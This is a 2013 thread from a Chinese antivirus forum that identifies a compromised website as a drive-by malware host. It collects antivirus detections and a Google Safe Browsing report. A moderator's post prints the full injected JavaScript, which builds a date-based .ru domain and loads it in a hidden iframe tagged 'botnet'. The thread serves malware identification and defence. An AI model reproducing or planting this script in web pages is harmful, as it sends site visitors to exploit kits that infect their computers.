查看: 1597|回复: 11
收起左侧

[已鉴定] http://15maggio.com/index.html【挂马 by 阿狸】

 关闭 [复制链接]
firefox3
发表于 2013-1-7 20:20:25 | 显示全部楼层 |阅读模式
本帖最后由 wjhstu-VxG 于 2013-1-11 14:04 编辑

suspicious
fireold
发表于 2013-1-7 20:23:49 | 显示全部楼层
Kaspersky Internet Security 2013

k24.jpg
fireold
发表于 2013-1-8 11:54:19 | 显示全部楼层
Norton 360

n1.jpg
紫皇雷帝
发表于 2013-1-8 13:49:48 | 显示全部楼层
2013-01-08_134931.png
Tom179090
发表于 2013-1-8 19:03:37 | 显示全部楼层
AVG:
漏洞利用blackhole Exploit Kit(type)
蓝核
发表于 2013-1-8 21:16:24 | 显示全部楼层
chrome封锁~
15maggio.com 目前被列为何种状态?
网站被列为可疑对象,访问此网站可能会损害您的计算机。

在过去 90 天里,此网站的某个部分由于可疑活动而被列出了 2 次。

Google 访问此网站时发生了什么?
我们在过去 90 天内对该网站进行了测试。在我们所测试的 3 个网页中,有 1 个网页导致了恶意软件未经用户许可便下载和安装到用户的计算机上。Google 最后一次访问此网站的时间是 2012-11-07,最后一次在此网站上发现可疑内容的时间是 2012-11-07。
恶意软件托管于 2 个域上,其中包括 knuidyekzkyuhtpi.ru/, chejtfoppvupcbhb.ru/。

此网站托管于 2 个网络之中,其中包括 AS35612 (NGI), AS15169 (Google Internet Backbone)。

此网站是否充当了媒介,导致恶意软件的进一步散播?
在过去 90 天里,15maggio.com 应该没有充当媒介感染任何网站。

此网站是否托管了恶意软件?
否,此网站在过去 90 天里没有托管恶意软件。

为什么会发生这种情况?
在某些情况下,第三方可能会向合法网站添加恶意代码,这会导致我们显示警告消息。

大谷歌好可怕……

评分

参与人数 1经验 +20 收起 理由
wjhstu-VxG + 20 感谢支持,欢迎常来: )

查看全部评分

bywy-win
发表于 2013-1-9 13:52:19 | 显示全部楼层
ESET Smart Security


访问被拒绝




详细信息:



网页:

http://15maggio.com



安全威胁:

JS/Agent.NGF 特洛伊木马



注释:

此网页的访问已被ESET Smart Security拦截。
wjhstu-VxG
发表于 2013-1-10 16:51:58 | 显示全部楼层
  1. function nextRandomNumber(){
  2.     var hi = this.seed / this.Q;
  3.     var lo = this.seed % this.Q;
  4.     var test = this.A * lo - this.R * hi;
  5.     if(test > 0){
  6.         this.seed = test;
  7.     } else {
  8.         this.seed = test + this.M;
  9.     }
  10.     return (this.seed * this.oneOverM);
  11. }

  12. function RandomNumberGenerator(unix){
  13.     var d = new Date(unix*1000);
  14.     var s = d.getHours() > 12 ? 1 : 0;
  15.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
  16.     this.A = 48271;
  17.     this.M = 2147483647;
  18.     this.Q = this.M / this.A;
  19.     this.R = this.M % this.A;
  20.     this.oneOverM = 1.0 / this.M;
  21.     this.next = nextRandomNumber;
  22.     return this;
  23. }

  24. function createRandomNumber(r, Min, Max){
  25.     return Math.round((Max-Min) * r.next() + Min);
  26. }

  27. function generatePseudoRandomString(unix, length, zone){
  28.     var rand = new RandomNumberGenerator(unix);
  29.     var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
  30.     var str = '';
  31.     for(var i = 0; i < length; i ++ ){
  32.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  33.     }
  34.     return str + '.' + zone;
  35. }

  36. setTimeout(function(){
  37.     try{
  38.         if(typeof iframeWasCreated == "undefined"){
  39.             iframeWasCreated = true;
  40.             var unix = Math.round(+new Date()/1000);
  41.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  42.             ifrm = document.createElement("IFRAME");
  43.             ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet");
  44.             ifrm.style.width = "0px";
  45.             ifrm.style.height = "0px";
  46.             ifrm.style.visibility = "hidden";
  47.             document.body.appendChild(ifrm);
  48.         }
  49.     }catch(e){}
  50. }, 500);
复制代码
251634630
发表于 2013-1-11 20:04:39 | 显示全部楼层
猎豹没反应~哈哈
清茗微漾
发表于 2013-1-13 00:31:38 | 显示全部楼层
搜狗截图_2013-01-13_00-31-04.jpg
opera真的很唯美。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 12:43 , Processed in 0.155395 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表